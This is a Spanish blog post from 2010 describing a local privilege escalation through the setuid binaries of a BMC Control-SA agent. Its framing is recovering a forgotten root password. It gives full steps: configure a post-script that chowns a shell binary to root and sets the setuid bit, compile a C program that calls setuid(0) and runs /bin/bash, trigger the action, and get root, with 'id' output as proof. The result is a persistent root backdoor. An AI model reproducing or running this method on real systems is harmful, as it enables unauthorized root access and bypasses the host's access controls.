Para los casos en los que se ha olvidado la password de root y no queremos hacernos con root cambiando la password desde Control-SA ( la suite de BMC Enterprise Security Station ), existe otra posibilidad... hacernos una rootshell...
Lo primero que tenemos que tener, es un agente de Control-SA de tipo unix que administre ese mismo unix en el que estamos. Verificar que en ese agente instalado, existen los archivos setuidados en el path donde estan los binarios.
En el caso en que se cumpla la condición anterior, enhorabuena! eres uno de los pocos afortunados en España que toca Control-SA! xP
Nos logueamos con el owner de la instalación del agente, y editamos el archivo de configuración en donde se asocian los comandos de Control-SA a los pre/post scripts. Ponemos a "Y" un postscript para los updates ( por poner un ejemplo ), le asignamos el script updatea.sh, y reiniciamos el agente.
Nos vamos al directorio de los pre/postscripts y creamos updatea.sh con el siguiente contenido:
chown root $HOME/mishell
chmod 4755 $HOME/mishell
Le damos permisos de ejecución:
chmod u+x updatea.sh
Generarnos mishell. Para ello, nos creamos un archivo.c :
main() {
setgid(0);
setuid(0);
system("/bin/bash");
}
generamos el binario..
gcc -o mishell archivo.c
Solo faltaría lanzar desde Control-SA la acción que hayamos especificado en el archivo de configuración de los pre/postscripts. Veremos como esa transacción finaliza en error, y eso significará que nuestro script updatea.sh se ha ejecutado! Al no haberle parametrizado al script con la entrada y salida de Control-SA, la acción finaliza en error... pero eso nos dará igual, lo importante es saber que nuestro script ha sido ejecutado por el binario setuidado ;-). Nos vamos al $HOME donde tenemos mishell y lo ejecutamos...
./mishell
id
uid=0(root) gid=0(root) grupos=0(root)
;-)
Rootshell por medio de un agente de Control-SA
martes, 12 de enero de 2010
en
22:10
Posted In
rootshell
| |
Suscribirse a:
Enviar comentarios (Atom)
0 comentarios